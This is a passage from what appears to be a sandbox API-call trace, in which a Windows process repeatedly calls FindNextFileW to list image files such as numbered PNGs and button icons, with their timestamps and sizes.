| out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0f1aec, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0f1aec, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="1px.gif", cAlternateFileName="")) returned 1 [0135.461] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc117c4b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc117c4b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.png", cAlternateFileName="")) returned 1 [0135.462] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc13ddaa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc13ddaa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="20.png", cAlternateFileName="")) returned 1 [0135.462] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc13ddaa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc13ddaa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="21.png", cAlternateFileName="")) returned 1 [0135.462] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc13ddaa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc13ddaa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="22.png", cAlternateFileName="")) returned 1 [0135.463] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc13ddaa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc13ddaa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x15c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="23.png", cAlternateFileName="")) returned 1 [0135.463] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc163f09, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc163f09, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x15c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="24.png", cAlternateFileName="")) returned 1 [0135.463] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc18a068, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc18a068, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x15c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="25.png", cAlternateFileName="")) returned 1 [0135.463] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc18a068, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc18a068, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="26.png", cAlternateFileName="")) returned 1 [0135.464] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc1b01c7, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc1b01c7, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="27.png", cAlternateFileName="")) returned 1 [0135.464] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc1d6326, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc1d6326, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="28.png", cAlternateFileName="")) returned 1 [0135.464] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc1fc485, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc1fc485, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1010, dwReserved0=0x0, dwReserved1=0x0, cFileName="29.png", cAlternateFileName="")) returned 1 [0135.464] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc1fc485, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc1fc485, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd75823c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.png", cAlternateFileName="")) returned 1 [0135.465] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc2225e4, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc2225e4, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd75823c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1010, dwReserved0=0x0, dwReserved1=0x0, cFileName="30.png", cAlternateFileName="")) returned 1 [0135.465] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc2225e4, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc2225e4, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd75823c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x16df, dwReserved0=0x0, dwReserved1=0x0, cFileName="31.png", cAlternateFileName="")) returned 1 [0135.465] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc248743, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc248743, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd75823c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x16df, dwReserved0=0x0, dwReserved1=0x0, cFileName="32.png", cAlternateFileName="")) returned 1 [0135.466] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc248743, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc248743, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd75823c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1010, dwReserved0=0x0, dwReserved1=0x0, cFileName="33.png", cAlternateFileName="")) returned 1 [0135.466] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc26e8a2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc26e8a2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd77e39c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1010, dwReserved0=0x0, dwReserved1=0x0, cFileName="34.png", cAlternateFileName="")) returned 1 [0135.466] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc294a01, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc294a01, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd77e39c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="35.png", cAlternateFileName="")) returned 1 [0135.466] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc294a01, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc294a01, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7a44fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x16df, dwReserved0=0x0, dwReserved1=0x0, cFileName="36.png", cAlternateFileName="")) returned 1 [0135.467] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc2bab60, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc2bab60, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7a44fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="37.png", cAlternateFileName="")) returned 1 [0135.467] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc2bab60, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc2bab60, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7a44fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="38.png", cAlternateFileName="")) returned 1 [0135.467] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc2bab60, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc2bab60, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7a44fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="39.png", cAlternateFileName="")) returned 1 [0135.467] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc306e1e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc306e1e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7a44fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="4.png", cAlternateFileName="")) returned 1 [0135.468] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc32cf7d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc32cf7d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7ca65c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1874, dwReserved0=0x0, dwReserved1=0x0, cFileName="40.png", cAlternateFileName="")) returned 1 [0135.468] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc32cf7d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc32cf7d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7ca65c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="41.png", cAlternateFileName="")) returned 1 [0135.468] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc3530dc, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc3530dc, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7f07bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1135, dwReserved0=0x0, dwReserved1=0x0, cFileName="42.png", cAlternateFileName="")) returned 1 [0135.469] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc37923b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc37923b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7f07bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1135, dwReserved0=0x0, dwReserved1=0x0, cFileName="43.png", cAlternateFileName="")) returned 1 [0135.469] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc37923b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc37923b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7f07bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="44.png", cAlternateFileName="")) returned 1 [0135.469] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc39f39a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc39f39a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd81691c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="45.png", cAlternateFileName="")) returned 1 [0135.469] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc39f39a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc39f39a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd81691c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="46.png", cAlternateFileName="")) returned 1 [0135.470] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc4117b7, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc4117b7, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd81691c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="47.png", cAlternateFileName="")) returned 1 [0135.470] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc4117b7, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc4117b7, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd83ca7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1701, dwReserved0=0x0, dwReserved1=0x0, cFileName="5.png", cAlternateFileName="")) returned 1 [0135.470] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc437916, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc437916, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd83ca7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1701, dwReserved0=0x0, dwReserved1=0x0, cFileName="6.png", cAlternateFileName="")) returned 1 [0135.470] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc4a9d33, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc4a9d33, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd83ca7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1701, dwReserved0=0x0, dwReserved1=0x0, cFileName="7.png", cAlternateFileName="")) returned 1 [0135.471] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc4cfe92, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc4cfe92, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd862bdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="8.png", cAlternateFileName="")) returned 1 [0135.471] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc51c150, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc51c150, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd862bdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="9.png", cAlternateFileName="")) returned 1 [0135.471] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc5422af, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc5422af, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd8aee9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3032, dwReserved0=0x0, dwReserved1=0x0, cFileName="activity16v.png", cAlternateFileName="")) returned 1 [0135.471] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27fcb6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd27fcb6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd8d4ffc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="alertIcon.png", cAlternateFileName="")) returned 1 [0135.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd0dcda1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd0dcda1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd8d4ffc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xcde, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn_close_down.png", cAlternateFileName="")) returned 1 [0135.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd12905f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd12905f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd8d4ffc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xcdf, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn_close_down_BIDI.png", cAlternateFileName="")) returned 1 [0135.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd12905f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd12905f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd8fb15c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xcdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn_close_over.png", cAlternateFileName="")) returned 1 [0135.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd102f00, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd102f00, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd9936dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn_close_up.png", cAlternateFileName="")) returned 1 [0135.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd17531d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd17531d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbda05afc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xdf5, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn_search_down.png", cAlternateFileName="")) returned 1 [0135.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd19b47c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd19b47c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbda2bc5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xdfd, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn_search_down_BIDI.png", cAlternateFileName="")) returned 1 [0135.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd19b47c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd19b47c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbda9e07c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xde7, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn_search_over.png", cAlternateFileName="")) returned 1 [0135.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd1e773a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd1e773a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbda9e07c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xdfe, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn_search_over_BIDI.png", cAlternateFileName="")) returned 1 [0135.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd14f1be, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd14f1be, ftLastAccessTime.dwHighDateTime=0x1ca0404, 